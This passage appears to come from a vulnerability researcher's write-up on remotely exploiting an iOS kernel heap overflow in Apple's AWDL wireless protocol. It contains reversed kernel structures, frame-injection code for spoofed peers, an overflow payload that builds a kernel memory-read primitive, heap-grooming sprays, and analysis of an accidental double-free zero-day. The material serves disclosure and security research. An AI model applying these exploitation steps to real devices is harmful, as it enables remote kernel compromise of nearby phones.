/* +0x0655 */  uint8_t chanseq_count;

/* +0x0656 */  uint8_t chanseq_step_count;

/* +0x0657 */  uint8_t chanseq_dup_count;

/* +0x0658 */  uint8_t pad19[4];

/* +0x0650 */  uint16_t chanseq_fill_channel;

/* +0x065E */  uint8_t chanseq_channels[32];

/* +0x067E */  uint8_t pad2[64];

/* +0x06BE */  uint8_t raw_chanseq[64];

/* +0x06FE */  uint8_t pad18[194];

/* +0x07C0 */  uint64_t last_UMI_update_timestamp;

/* +0x0708 */  struct IO80211AWDLPeer *UMI_chain_flink;

/* +0x07D0 */  uint8_t pad16[8];

/* +0x07D8 */  uint8_t is_in_umichain;

/* +0x0709 */  uint8_t pad15[79];

/* +0x0828 */  uint8_t datapath_tlv_flags_bit_5_dualband;

/* +0x0829 */  uint8_t pad12[2];

/* +0x082B */  uint8_t SDB_mode;

/* +0x082C */  uint8_t pad6[28];

/* +0x0848 */  uint8_t did_parse_datapath_tlv;

/* +0x0849 */  uint8_t pad7[1011];

/* +0x0C3C */  uint32_t UMI_feature_mask;

/* +0x0C40 */  uint8_t pad22[2568];

/* +0x1648 */  struct ether_addr sync_tree_macs[10]; // overflowable

/* +0x1684 */  uint8_t sync_error_count;

/* +0x1685 */  uint8_t had_chanseq_tlv;

/* +0x1686 */  uint8_t pad3[2];

/* +0x1688 */  uint64_t per_second_timestamp;

/* +0x1690 */  uint32_t n_frames_in_last_second;

/* +0x1694 */  uint8_t pad21[4];

/* +0x1698 */  void *steering_msg_blob;  // NEW FIELD

/* +0x16A0 */  uint32_t steering_msg_blob_size;  // NEW FIELD

}

The layout of fields in my reverse-engineered version of IO80211AWDLPeer. You can define and edit structures in C-syntax like this using the Local Types window in IDA: right-clicking a type and selecting "Edit..." brings up an interactive edit window; it's very helpful for reversing complex data structures such as this.


There are new fields! In fact, there's a new pointer field and length field right at the end of the IO80211AWDLPeer object. But what is a steering_msg_blob? What is BSS Steering?

BSS Steering

Let's take a look at where the steering_msg_blob pointer is used.


It's allocated in IO80211AWDLPeer::populateBssSteeringMsgBlob, via the following call stack:


IO80211PeerBssSteeringManager::processPostSyncEvaluation

IO80211PeerBssSteeringManager::bssSteeringStateMachine


bssSteeringStateMachine is called from many places, including IO80211AWDLPeer::actionFrameReport when it parses a BSS Steering TLV (type 0x1d), so it looks like we can indeed drive this state machine remotely somehow.


The steering_msg_blob pointer is freed in IO80211AWDLPeer::freeResources when the IO80211AWDLPeer object is destroyed:


  steering_msg_blob = this->steering_msg_blob;

  if ( steering_msg_blob )

  {

    kfree(steering_msg_blob, this->steering_msg_blob_size);


This gives us our first new primitive: an arbitrary free. Without needing to reverse any of the BSS Steering code we can quite easily overflow from the sync_tree_macs field into the steering_msg_blob and steering_msg_blog_size fields, setting them to arbitrary values.


If we then wait for the peer to timeout and be destroyed, when ::freeResources is called it will call kfree with our arbitrary pointer and size.


The steering_msg_blob is also used in one more place:


In IO80211AWDLPeerManager::handleUmiTimer the IO80211AWDLPeerManager walks a linked-list of peers (a separate linked-list from that used to store all the peers) and from each of the peers in that list it checks whether that peer and the current device are on the same channel and in an availability window:


if ( peer_manager->current_channel_ == peer->chanseq_channels[peer_manager->current_chanseq_step] ) {

...


If the UMI timer has indeed fired when both this device and the peer from the UMI list are on the same channel in an overlapping availability window then the IO80211AWDLPeerManager removes the peer from the UMI list, reads the bss_steering_blob from the peer and passes it as the last argument to the peer's::sendUnicastMI method.


This passes that blob to IO80211AWDLPeerManager::buildMasterIndicationTemplate to build an AWDL master indication frame before attempting to transmit it.


Let's look at how buildMasterIndicationTemplate uses the steering_msg_blob:


The third argument to buildMasterIndicationTemplate is is_unicast_MI which indicates whether this method was called by IO80211AWDLPeerManager::sendUnicastMI (which sets it to 1) or IO80211AWDLPeerManager::updatePrimaryPayloadMI (which sets it to 0.)


If buildMasterIndicationTemplate was called to build a unicast MI frame and the peer's feature_mask field has 0xD'th bit set then the steering_msg_blob will be passed to IO80211AWDLPeerManager::buildMultiPeerBssSteeringTlv. This method reads a size from the second dword in the steering_msg_blob and checks whether it is smaller than the remaining space in the frame template buffer; if it is, then that size value is used to copy that number of bytes from the steering_msg_blob pointer into a TLV (type 0x1d) in the template frame which will then be sent out over the air!


There's clearly a path here to get a semi-arbitrary read; but actually triggering it will require quite a bit more reversing. We need the UMI timer to be firing and we also need to get a peer into the UMI linked list.

BSS steering state machine

At this point a sensible question to ask is, what exactly is BSS Steering? A bit of googling tells us that it's part of 802.11v; a set of management standards for enterprise networks. One of the advanced features of enterprise networks is the ability to seamlessly move devices between different access points which form part of the same network; for example when you walk around the office with your phone or if there are too many devices associated with one access point. AWDL isn't part of 802.11v. My best guess as to what's happening here is that AWDL is driving the 802.11v AP roaming code to try to move AWDL clients on to a common infrastructure network. I think this code was added to support Sidecar, but everything below is based only on static reversing.


IO80211PeerBssSteeringManager::bssSteeringStateMachine is responsible for driving the BSS steering state machine. The first argument is a bssSteeringEvent enum value representing an event which the state machine should process. Using the IO80211PeerBssSteeringManager::getEventName method we can determine the names for all the events which the state machine will process and using the IO80211PeerBssSteeringManager::getStateName method we can determine the names of the states which the state machine can be in. Again using the local types window in IDA we can define enums for these which will make the HexRays decompiler output much more readable:


enum BSSSteeringState

{

  BSS_STEERING_STATE_IDLE = 0x0,

  BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL = 0x1,

  BSS_STEERING_STATE_ASSOCIATION_ONGOING = 0x2,

  BSS_STEERING_STATE_TX_CONFIRM_AWAIT = 0x3,

  BSS_STEERING_STATE_STEERING_SYNC_CONFIRM_AWAIT = 0x4,

  BSS_STEERING_STATE_STEERING_SYNCED = 0x5,

  BSS_STEERING_STATE_STEERING_SYNC_FAILED = 0x6,

  BSS_STEERING_STATE_SELF_STEERING_ASSOCIATION_ONGOING = 0x7,

  BSS_STEERING_STATE_STEERING_SYNC_POST_EVAL = 0x8,

  BSS_STEERING_STATE_SUSPEND = 0x9,

  BSS_STEERING_INVALID = 0xA,

};


enum bssSteeringEvent

{

 BSS_STEERING_MODE_ENABLE = 0x0,

 BSS_STEERING_RECEIVED_DIRECTED_STEERING_CMD = 0x1,

 BSS_STEERING_DO_PRESYNC_EVAL = 0x2,

 BSS_STEERING_PRESYNC_EVAL_DONE = 0x3,

 BSS_STEERING_SELF_INFRA_LINK_CHANGED = 0x4,

 BSS_STEERING_DIRECTED_STEERING_CMD_SENT = 0x5,

 BSS_STEERING_DIRECTED_STEERING_TX_CONFIRM_RXED = 0x6,

 BSS_STEERING_SYNC_CONFIRM_ATTEMPT = 0x7,

 BSS_STEERING_SYNC_SUCCESS_EVENT = 0x8,

 BSS_STEERING_SYNC_FAILED_EVENT = 0x9,

 BSS_STEERING_OVERALL_STEERING_TIMEOUT = 0xA,

 BSS_STEERING_DISABLE_EVENT = 0xB,

 BSS_STEERING_INFRA_LINK_CHANGE_TIMEOUT = 0xC,

 BSS_STEERING_SELF_STEERING_REQUESTED = 0xD,

 BSS_STEERING_SELF_STEERING_DONE = 0xE,

 BSS_STEERING_SUSPEND_EVENT = 0xF,

 BSS_STEERING_RESUME_EVENT = 0x10,

 BSS_STEERING_REMOTE_STEERING_TRIGGER = 0x11,

 BSS_STEERING_PEER_INFRA_LINK_CHANGED = 0x12,

 BSS_STEERING_REMOTE_STEERING_FAILED_EVENT = 0x13,

 BSS_STEERING_INVALID_EVENT = 0x14,

};


The current state is maintained in a steering context object, owned by the IO80211PeerBssSteeringManager. Reverse engineering the state machine code we can come up with the following rough definition for the steering context object:


struct __attribute__((packed)) BssSteeringCntx

{

  uint32_t first_field;

  uint32_t service_type;

  uint32_t peer_count;

  uint32_t role;

  struct ether_addr peer_macs[8];

  struct ether_addr infraBSSID;

  uint8_t pad4[6];

  uint32_t infra_channel_from_datapath_tlv;

  uint8_t pad8[8];

  char ssid[32];

  uint8_t pad1[12];

  uint32_t num_peers_added_to_umi;

  uint8_t pad_10;

  uint8_t pendingTransitionToNewState;

  uint8_t pad7[2];

  enum BSSSteeringState current_state;

  uint8_t pad5[8];

  struct IOTimerEventSource *bssSteeringExpiryTimer;

  struct IOTimerEventSource *bssSteeringStageExpiryTimer;

  uint8_t pad9[8];

  uint32_t steering_policy;

  uint8_t inProgress;

};


Our goal here is reach IO80211AWDLPeer::populateBssSteeringMsgBlob which is called by IO80211PeerBssSteeringManager::processPostSyncEvaluation which is called when the state machine is in the BSS_STEERING_STATE_STEERING_SYNC_POST_EVAL state and receives the BSS_STEERING_PRESYNC_EVAL_DONE event.

Navigating the state machine

Each time a state is evaluated it can change the current state and optionally set the stateMachineTriggeredEvent variable to a new event and set sendEventToNewState to 1. This way the state machine can drive itself forwards to a new state. Let's try to find the path to our target state:


The state machine begins in BSS_STEERING_STATE_IDLE. When we send the BSS steering TLV for the first time this injects either the BSS_STEERING_REMOTE_STEERING_TRIGGER or BSS_STEERING_RECEIVED_DIRECTED_STEERING_CMD event depending on whether the steeringMsgID in the TLV was was 6 or 0.


This causes a call to IO80211PeerBssSteeringManager::processBssSteeringEnabled which parses a steering_msg structure which itself was parsed from the bss steering tlv; we'll take a look at both of those in a moment. If the steering manager is happy with the contents of the steering_msg structure from the TLV it starts two IOTimerEventSources: the bssSteeringExpiryTimer and the bssSteeringStageExpiryTimer. The SteeringExpiry timer will abort the entire steering process when it triggers, which happens after a few seconds. The StageExpiry timer allows the state machine to make progress asynchronously. When it expires it will call the IO80211PeerBssSteeringManager::bssSteeringStageExpiryTimerHandler function, a snippet of which is shown here:


  cntx = this->steering_cntx;

  if ( cntx && cntx->pendingTransitionToNewState )

  {

    current_state = cntx->current_state;

    switch ( current_state )

    {

      case BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL:

        event = BSS_STEERING_DO_PRESYNC_EVAL;

        break;

      case BSS_STEERING_STATE_ASSOCIATION_ONGOING:

      case BSS_STEERING_STATE_SELF_STEERING_ASSOCIATION_ONGOING:

        event = BSS_STEERING_INFRA_LINK_CHANGE_TIMEOUT;

        break;

      case BSS_STEERING_STATE_STEERING_SYNC_CONFIRM_AWAIT:

        event = BSS_STEERING_SYNC_CONFIRM_ATTEMPT;

        break;

      default:

        goto ERR;

    }

    result = this->bssSteeringStateMachine(this, event, ...


We can see here the four state transitions which may happen asynchronously in the background when the StageExpiry timer fires and causes events to be injected.


From BSS_STEERING_STATE_IDLE, after the timers are initialized the code sets the pendingTranstionToNewState flag and updates the state to BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL:


  this->steering_cntx->pendingTransitionToNewState = 1;

  state = BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL;


We can now see that this will cause the the BSS_STEERING_DO_PRESYNC_EVAL event to be injected into the steering state machine and we reach the following code:


  case BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL:

   {

     if ( EVENT == BSS_STEERING_DO_PRESYNC_EVAL ) {

       steering_policy = this->processPreSyncEvaluation(cntx);

       ...


Here the BSS steering TLV gets parsed and reformatted into a format suitable for the BSS steering code, presumably this is the compatibility layer between the 802.11v enterprise WiFi BSS steering code and AWDL.


We need the IO80211PeerBssSteeringManager::processPreSyncEvaluation to return a steering_policy value of 7. The code which determines this is very complicated; in the end it turns out that if the target device is currently connected to a 5Ghz network on a non-DFS channel then we can get it to return the right steering policy value to reach BSS_STEERING_STATE_STEERING_SYNC_POST_EVAL. DFS channels are dynamic and can be disabled at runtime if radar is detected. There's no requirement that the attacker is also on the same 5GHz network. There might also be another path to reach the required state but this will do.


At this point we finally reach processPostSyncEvaluation and the steeringMsgBlob will be allocated and the UMI timer armed. When it starts firing the code will attempt to read the steering_msg_blob pointer and send the buffer it points to over the air.

Building the read

Let's look concretely at what's required for the read:


We need two spoofer peers:


struct ether_addr reader_peer = *(ether_aton("22:22:aa:22:00:00"));

struct ether_addr steerer_peer = *(ether_aton("22:22:bb:22:00:00"));


The target device needs to be aware of both these peers so we allocate the reader peer by spoofing a frame from it:


inject(RT(),

       WIFI(dst, reader_peer),

       AWDL(),

       SYNC_PARAMS(),

       CHAN_SEQ_EMPTY(),

       HT_CAPS(),

       UNICAST_DATAPATH(0x1307 | 0x800),

       PKT_END());


There are two important things here:


1) This peer will have a channel sequence which is empty; this is crucial as it means we can enforce a gap between the allocation of the steering_msg_blob by processPostSyncEvaluation and its use in the UMI timer. Recall that we saw earlier that the unicast MI template only gets built when the UMI timer fires during a peer availability window; if the peer has no availability windows, then the template won't be updated and the steering_msg_blob won't be used. We can easily change the channel sequence later by sending a different TLV.


2) The flags in the UNICAST_DATAPATH TLV. That 0x800 is quite important, without it this happens:


This tweet from @mdowd on May 27th 2020 mentioned a double free in BSS reachable via AWDL


We'll get to that...


The next step is to allocate the steerer_peer and start steering the reader:


inject(RT(),

      WIFI(dst, steerer_peer),

      AWDL(),

      SYNC_PARAMS(),

      HT_CAPS(),

      UNICAST_DATAPATH(0x1307),

      BSS_STEERING(&reader_peer, 1),

      PKT_END());


Let's look at the bss_steering TLV:


struct bss_steering_tlv {

  uint8_t type;

  uint16_t length;

  uint32_t steeringMsgID;

  uint32_t steeringMsgLen;

  uint32_t peer_count;

  struct ether_addr peer_macs[8];

  struct ether_addr BSSID;

  uint32_t steeringTimeoutThreshold;

  uint32_t SSID_len;

  uint8_t infra_channel;

  uint32_t steeringCmdFlags;

  char SSID[32];

} __attribute__((packed));


We need to carefully choose these values; the important part for the exploit however is that we can specify up to 8 peers to be steered at the same time. For this example we'll just steer one peer. Here we build a bss_steering_tlv with only one peer_mac set to the mac address of reader_peer. If we've set everything up correctly this should cause the IO80211AWDLPeer for the reader_peer object to allocate a steering_msg_blob and start the UMI timer firing trying to send that blob in a UMI


UMI?

UMIs are Unicast Master Indication frames; unlike regular AWDL Master Indication frames UMIs are sent to unicast MAC addresses.


We can now send a final frame:


char overflower[0x80] = {0};

*(uint64_t*)(&overflower[0x50]) = 0x4141414141414141;

 

inject(RT(),

       WIFI(dst, reader_peer),

       AWDL(),

       SYNC_PARAMS(),

       SERV_PARAM(),

       HT_CAPS(),

       DATAPATH(reader_peer),

       SYNC_TREE((struct ether_addr*)overflower,

                  sizeof(overflower)/sizeof(struct ether_addr)),

       PKT_END());


There are two important parts to this frame:


1) We've included a SyncTree TLV which will trigger the buffer overflow. SYNC_TREE will copy the MAC addresses in overflower into the sync_tree_macs inline buffer in the IO80211AWDLPeer:


/* +0x1648 */  struct ether_addr sync_tree_macs[10];

/* +0x1684 */  uint8_t sync_error_count;

/* +0x1685 */  uint8_t had_chanseq_tlv;

/* +0x1686 */  uint8_t pad3[2];

/* +0x1688 */  uint64_t per_second_timestamp;

/* +0x1690 */  uint32_t n_frames_in_last_second;

/* +0x1694 */  uint8_t pad21[4];

/* +0x1698 */  void *steering_msg_blob;

/* +0x16A0 */  uint32_t steering_msg_blob_size;


sync_tree_macs is at offset +0x1648 in the IO80211AWDLPeer object and the steering_msg_blob is at +0x1698 so by placing our arbitrary read target 0x50 bytes in to the SYNC_TREE tlv we'll overwrite the steering_msg_blob, in this case with the value 0x4141414141414141.


2) The other important part is that we no longer send the CHAN_SEQ_EMPTY TLV, meaning this peer will use the channel sequence in the sync_params TLV. This contains a channel sequence where the peer declares they are listening in every Availability Window (AW), meaning that the next time the UMI timer fires while the target device is also in an AW it will read the corrupted steering_msg_blob pointer and try to build a UMI using it. If we sniff for UMI frames coming from the target MAC address (dst in this example) and parse out TLV 0x1d we'll find our (almost) arbitrarily read memory!


In this case of course trying to read from an address like 0x4141414141414141 will almost certainly cause a kernel panic, so we've still got more work to do.

Almost-arbitrary read

There are some important limitations for this read technique: firstly, the steering_msg_blob has its length as the second dword member and that length will be used as the length of memory to copy into the UMI. This means that we can only read from places where the second dword pointed to is a small value less than around 800 (the available space in the UMI frame.) That size also dictates how much will be read. We can work with this as an initial arbitrary read primitive however.


The second limitation is the speed of these reads; in order to steer multiple peers at the same time and therefore perform multiple reads in parallel we'll need some more tricks. For now, the only option is to wait for steering to fail and restart the steering process. This takes around 8 seconds, after which the steering process can be restarted by using a steeringMsgId value of 0 rather than 6 in in the BSS_STEERING TLV. 

What to read

At this point we can get memory sent back to us provided it meets some requirements. Helpfully if the memory doesn't meet those requirements as long as the virtual address was mapped and readable the code won't crash so we have some leeway.


My first idea here was to use the physmap, an (almost) 1:1 virtual mapping of the physical address space in virtual memory. The base of the physmap address is randomized on iOS but the slide is smaller than the physical address space size, meaning there's a virtual address in there you can always read from. This gives you a safe virtual address to dereferences to start trying to find pointers to follow.


It was around this point in the development of the exploit that Apple released iOS 13.3.1 which patched the heap overflow. I wanted to also release at least some kind of demo at this point so I released a very basic proof-of-concept which drove the BSS Steering state machine far enough to read from the physmap along with a little javascript snippet you could run in Safari to spray physical memory to demonstrate that you really were reading user data. Of course, this isn't all that compelling; the more compelling demo is still a few months down the road.


Discussing these problems with fellow Project Zero researchers Brandon Azad and Jann Horn, Brandon mentioned that on iOS the base of the zone map, used for most general kernel heap allocations, wasn't very randomized at all. I had looked at this using DTrace on MacOS and it seemed fairly randomized, but dumping kernel layout information on iOS isn't quite as trivial as setting a boot argument to disable SIP and enable kernel DTrace.


Brandon had recently finished the exploit for his oob_timestamp bug and as part of that he'd made a spreadsheet showing various values such as the base of the zone and kalloc maps across multiple reboots. And indeed, the randomization of the base of the zone map is very minimal, around 16 MB:


kASLR

sane_size

zone_min

zone_max

04da4000

72fac000

ffffffe000370000

ffffffe02b554000

080a4000

73cac000

ffffffe0007bc000

ffffffe02be80000

08b28000

73228000

ffffffe00011c000

ffffffe02b3ec000

0bbb0000

721a4000

ffffffe0005bc000

ffffffe02b25c000

0c514000

7383c000

ffffffe000650000

ffffffe02bb68000

0d4d4000

72880000

ffffffe0002d8000

ffffffe02b208000

107d4000

7357c000

ffffffe00057c000

ffffffe02b98c000

12c08000

73148000

ffffffe000598000

ffffffe02b814000

13fb8000

71d98000

ffffffe000714000

ffffffe02b230000

184fc000

73854000

ffffffe00061c000

ffffffe02bb3c000


Using the Service Response Descriptor TLV technique we can allocate 16MB of memory in just a handful of frames, which means we should stand a reasonable chance of being able to safely find our allocations on the heap.

Finding ourselves

What would we like to read? We've discussed before that in order to safely corrupt the fields after the vtable in the IO80211AWDLPeer object we'll need to know a PAC'ed vtable pointer so we'd like to read one of those. If we're able to find one of those we'll also know the address of at least one IO80211AWDLPeer object.


If you make enough allocations of a particular size in iOS they will tend to go from lower addresses to higher addresses. Apple has introduced various small randomizations into exactly how objects are allocated but they're not relevant if we just examine the overall trend, which is to try to fill the virtual memory area reserved for the zone map from bottom to top.


As the maximum slide value of the zone map is smaller than its size there will be a virtual address which is always inside the zone map


The insufficient randomization of the zone map base gives us quite a large virtual memory region I've dubbed the safe probe region where, provided we go approximately from low to high we can safely read.


Our heap groom is as follows:


We send a large number of service_response TLVs, each of which has the following form:


struct service_response_16k_id_tlv sr = {0};

 

sr.type = 2;

sr.len = sizeof(struct service_response_16k_id_tlv) - 3;

sr.s_1 = 2;

sr.key_buf[0] = 'A';

sr.key_buf[1] = 'B';

sr.v_1 = 0x4000;

sr.v_2 = 0x1648; // offset

sr.val_buf[0] = 6;  // msg_type

sr.val_buf[1] = 0x320; // msg_id

sr.val_buf[2] = 0x41414141; // marker

sr.val_buf[3] = val; // value


Each of these TLVs causes the target device to make a 16KB kalloc allocation (one physical page) and then at offset +0x1648 in there write the following 4 dwords:


6

0x320

0x41414141

counter


The counter value increments by one for each TLV we send.


We put 39 of these TLVs in every frame which will result in the allocation of 39 physical pages, or over 600kb, for each AWDL frame we send, allowing us to rapidly allocate memory.


We split the groom into three sections, first sending a number of these spray frames, then a number of spoofed peers to cause the allocation of a large number of IO80211AWDLPeer objects. Finally we send another large number of the service response TLVs.


This results in a memory layout approximating this:


Inside the safe probe region we aim to place a number of IO80211AWDLPeer objects, surrounded by service_response groom pages with approximately incrementing counter values


If we now use the BSS Steering arbitrary read primitive to read from near the bottom of the safe probe region at offset +0x1648 from page boundaries, we should hopefully soon find one of the service_response TLV buffers. Since each service_response groom contains a unique counter which we can then read, we can make a guess for the distance between this discovered service_response buffer and the middle of where we think target peers will be and so compute a new guess for the location of a target peer. This approach lets us do something like a binary search to find an IO80211AWDLPeer object reasonably efficiently


Why did I choose to read from offset +0x1648? Because that's also the offset of the sync_tree_macs buffer in the IO80211AWDLPeer where we can place arbitrary data. Each of those middle target peers is created like this:


struct peer_fake_steering_blob {

  uint32_t msg_id;

  uint32_t msg_len;

  uint32_t magic; // 0x43434343 == peer

  struct ether_addr mac; // the MAC of this peer

  uint8_t pad[32];

} __attribute__((packed));

 

struct peer_fake_steering_blob fake_steerer = {0};

 

fake_steerer.msg_id = 6;

fake_steerer.msg_len = 0x320;

fake_steerer.magic = 0x43434343;

fake_steerer.mac = target_groom_peer;

 

inject(RT(),

  WIFI(dst, target_groom_peer),

  AWDL(),

  SYNC_PARAMS(),

  SERV_PARAM(),

  HT_CAPS(),

  DATAPATH(target_groom_peer),

  SYNC_TREE((struct ether_addr*)&fake_steerer,

            sizeof(struct peer_fake_steering_blob)

              /sizeof(struct ether_addr)),

  PKT_END());


The magic value 0x43434343 lets us determine whether our read has found a service_response buffer or a peer. Following that we put the spoofed MAC address of this peer. This allows us to determine which peer has the address we guessed. If we do manage to find a peer allocation we can then examine the remaining bytes of disclosed memory; there's a high probability that following this peer is another peer, and we've disclosed the first few dozen bytes of it. Here's a hexdump of a successfully located peer:


An annotated hexdump of the disclosed memory when two neighbouring IO80211AWDLPeer objects are found. Here you can see the runtime values of the fields in the peer header, including the PAC'ed vtable pointer


We can see here that we have managed to find two peers next to each other. We'll call these lower_peer and upper_peer. By placing each sprayed peer's MAC address in the sync_tree_macs array we're able to determine both lower_peer and upper_peer's MAC address. Since we know which guessed virtual address we chose we also know the virtual addresses of lower_peer and upper_peer, and from the PAC'ed vtable pointer we can compute the KASLR slide.


From now on we can easily and repeatedly corrupt the fields seen above by sending a large sync tree TLV containing a modified version of this dumped memory:


Using the disclosed memory we can safely manipulate the lower fields in upper_peer using the SyncTree buffer overflow

A mild panic?

Accidental 0day 1 of 2

During my experiments to get the BSS Steering state machine working and into the desired state where it would send UMIs, I noticed that the target device would sometimes kernel panic, even when I was very sure that I hadn't triggered the heap overflow vulnerability. As it turns out, I was accidentally triggering another zero-day vulnerability...


oops!


This was slightly concerning as it had now been months since I had reported the first AWDL-based vulnerability to Apple and a fix for that had already shipped. One my early hopes for Project Zero would be that we could have a "research amplification" effect: we would invest significant effort in publicly less-understood areas of vulnerability research and exploitation and present our results to the affected vendors who would then use their significantly greater resources to continue this research. Vendors have resources such as source code and design documents which should make it vastly easier to audit many of these attack surfaces - we would be keen to assist in this second phase as well.


A more pragmatic view of reality is that whilst the security and product teams do want to continue our research, and do have many more resources, the one important resource they lack is time. Justifying the benefits of fixing a vulnerability which will become public in 90 days is easy but extracting the maximum value from that external report by investing a significant amount of time is much harder to justify; these teams already have other goals and targets for the quarter. Time is the key resource which makes Project Zero successful; we don't have to do vulnerability triage, or design review, or fix bugs or any of the other things typical product security teams have to do.


I mention this because I stumbled over (and reported to Apple) not one but two more remotely-exploitable radio-proximity 0-day vulnerabilities during this research, the first of which appears to have been at least on some level known about:



Mark Dowd is the co-founder of Azimuth, an Australian "market-leading information security business". 


It's well known to all vulnerability researchers that the easiest way to find a new vulnerability is to look very closely at the code near a vulnerability which was recently fixed. They are rarely isolated incidents and usually indicate a lack of testing or understanding across an entire area.


I'm emphasising this point because Mark Dowd's tweet above is claiming knowledge of a variant that wasn't so difficult to find. One that was so easy to find, in fact, that it falls out by accident if you make the slightest mistake when doing BSS Steering. 


We saw the function IO80211AWDLPeer::populateBssSteeringMsgBlob earlier; it's responsible for allocating and populating the steering_msg_blob buffer which will end up as the contents of the 0x1d TLV sent in a AWDL BSS Steering UMI.


At the beginning of the function they check whether this peer already has steering_msg_blob:


if (this->steering_msg_blob && this->steering_msg_blob_size) {

  ...

  kfree(this->steering_msg_blob, this->steering_msg_blob_size);

  this->steering_msg_blob = 0LL;

}


If it does have one it gets free'd and NULL-ed out.


They then compute the size of the new steering_msg_blob, allocate it and fill it in:


steering_blob_size = *(_DWORD *)(msg + 0x3C) + 0x4F;

this->steering_msg_blob = kalloc(steering_blob_size);

...

this->steering_blob_size = steering_blob_size;


All ok.


Right at the end of the function they then try to add the peer to the "UMI chain" - this is this other linked list of peers with pending UMIs which we saw earlier:


err = 0;

if (this->addPeerToUmiChain()) {

  if ( peer_manager

      && peer_manager->isSafeToSendUmiNow(

  this->chanseq_channels[peer_manager->current_chanseq_step + 1],0)) {

    err = 0;

    // in a shared AW; force UMI timer to expire now

    peer_manager->UMITimer->setTimeoutMS(0)

  }

} else {

  kfree(this->steering_msg_blob, this->steering_msg_blob_size);

  this->UMI_feature_mask = 0;

  err = 0xE00002BC;

}

return err;


If the peer gets successfully added to the UMI chain, they test whether they could send the UMI right now (if both this device and the target are in AW's on the same channel). If so, they force the UMI timer to expire, which triggers the code we saw earlier to read the steering_msg_blob, build the UMI template and send it.


However, if addPeerToUmiChain fails then the steering_msg_blob is freed. But unlike the earlier kfree, this time they don't NULL out the pointer before returning. The vulnerability here is that that field is expected to be the owner of that allocation; so if we can somehow come back into populateBssSteeringMsgBlob again this same value will be freed a second time.


There's an even easier way to trigger a double-kfree however: by doing nothing.


After a period of inactivity the IO80211AWDLPeer object will be destructed and free'd. As part of that the IO80211AWDLPeer::freeResources will be called, which does this:


steering_msg_blob = this->steering_msg_blob;

if ( steering_msg_blob ) {

  kfree(steering_msg_blob, this->steering_msg_blob_size);

  this->steering_msg_blob = 0LL;

  this->steering_msg_blob_size = 0;

}


This will see a value for steering_msg_blob which has already been freed and free it a second time. If an attacker were able to reallocate the buffer in between the two frees they could get that controlled object freed, leading to a use-after-free.


It actually took some reversing effort to work out how to make addPeerToUmiChain not fail. The trick is that the peer needs to have sent a datapath TLV with the 0x800 flag set in the first dword, and that's why we set that flag.


This vulnerability also opens a different possibility for the initial memory disclosure. By steering multiple peers it's possible to use this to construct a primitive where the target device will attempt to send a UMI containing memory from a steering_msg_blob which has been freed. With some heap grooming this could allow the disclosure of both a stale allocation as well as out-of-bounds data without needing to guess pointers. In the end I chose to stay with the low zone_map entropy technique as I also wanted to try to land this remote kernel exploit using only a single vulnerability.


We'll get back to the exploit now and take a look at accidental 0day 2 of 2 later on...

The path to a write

We've seen that the peer objects seem to be accessed frequently in the background, not just when we're sending frames. This is important to bear in mind as we search for our next corruption target.


One option could be to use the arbitrary free primitive. Maybe we could free a peer object but this would be tricky as the memory allocator would write metadata over the vtable pointer and the peer might be used in the background before we got a chance to ensure it was safe.


Another possibility could be to cause a type confusion. It's possible that you could find a useful gadget with such a primitive but I figured I'd keep looking for something else.


At this point I started going through more AWDL code looking for all indirect writes I could find. Being able to write even an uncontrolled value to an arbitrary address is usually a good stepping-stone to a full arbitrary memory write primitive.


There's one indirect write which stood out as particularly interesting; right at the start of IO80211AWDLPeer::actionFrameReport:


  peer_manager = this->peer_manager;

  frame_len = mbuf_len(frame_mbuf);

  peer_manager->total_bytes_received += frame_len;

  ++this->n_frames_in_last_second;

  per_second_timestamp = this->per_second_timestamp;

  absolute_time_now = mach_absolute_time();

  frames_in_last_second = this->n_frames_in_last_second;

  if ( ((absolute_time_now - per_second_timestamp) / 1000000)

        > 1024 )// more than 1024ms difference

  {

    if ( frames_in_last_second >= 0x21 )

      IO80211Peer::logDebug(

        (IO80211Peer *)this,

        "%s[%d] : Received %d Action Frames from peer %02X:%02X:%02X:%02X:%02X:%02X in 1 second. Bad Peer\n",

        "actionFrameReport",

        1533LL,

        frames_in_last_second,

        this->peer_mac.octet[0],

        this->peer_mac.octet[1],

        this->peer_mac.octet[2],

        this->peer_mac.octet[3],

        this->peer_mac.octet[4],

        this->peer_mac.octet[5]);

    this->per_second_timestamp = mach_absolute_time();

    this->n_frames_in_last_second = 1;

  }

  else if ( frames_in_last_second >= 0x21 )

  {

    *(_DWORD *)(a2 + 20) = 1;

    return 0;

  }

  ... // continue on to parse the frame


Those first three lines of the decompiler output are exactly the kind of indirect write we're looking for:


  peer_manager = this->peer_manager;

  frame_len = mbuf_len(frame_mbuf);

  peer_manager->total_bytes_received += frame_len;


The peer_manager field is at offset +0x28 in the peer object, easily corruptible with the linear overflow. The total_bytes_received field is a u32 at offset +0x7c80 in the peer manager, and frame_len is the length of the WiFi frame we send so we can set this to an arbitrary value, albeit at least 0x69 (the minimum AWDL frame size) and less than 1200 (potentially larger with fragmentation but it wouldn't help much). That arbitrary value would then get added to the u32 at offset +0x7c80 from the peer_manager pointer. This would be enough to do a byte-by-byte write of arbitrary memory, presuming you knew what was there before:


By corrupting upper_peer's peer_manager pointer then spoofing a frame from upper_peer we can cause an indirect write through the corrupted peer_manager pointer. The peer_manager has a dword field at offset +0x7c80 which counts the total number of bytes received from all peers; actionFrameReport will add the length of the frame spoofed from upper_peer to the dword at the corrupted peer_manager pointer + 0x7c80 giving us an arbitrary add primitive


We do have a limited read primitive already, probably enough to bootstrap ourselves to a full arbitrary read and therefore full arbitrary write. We can indeed reach this code with a corrupted peer_manager pointer and get an arbitrary add primitive. There's just one tiny problem, which will take many more weeks to solve: We'll panic immediately after the write.

Getting the timing right

Although the IO80211AWDLPeer's peer_manager field doesn't appear to be used often in the background (unlike the vtable), the peer_manager field will be used later on in the actionFrameReport method, and since we're trying to write to arbitrary addresses it will almost certainly cause a panic.


Looking at the code, there is only one safe path out of actionFrameReport:


  if ( ((absolute_time_now - per_second_timestamp) / 1000000)

        > 1024 )// more than 1024ms difference

  {

    if (frames_in_last_second >= 0x21)

      IO80211Peer::logDebug(

        (IO80211Peer *)this,

        "%s[%d] : Received %d Action Frames from peer %02X:%02X:%02X:%02X:%02X:%02X in 1 second. Bad Peer\n",

        "actionFrameReport",

        1533LL,

        frames_in_last_second,

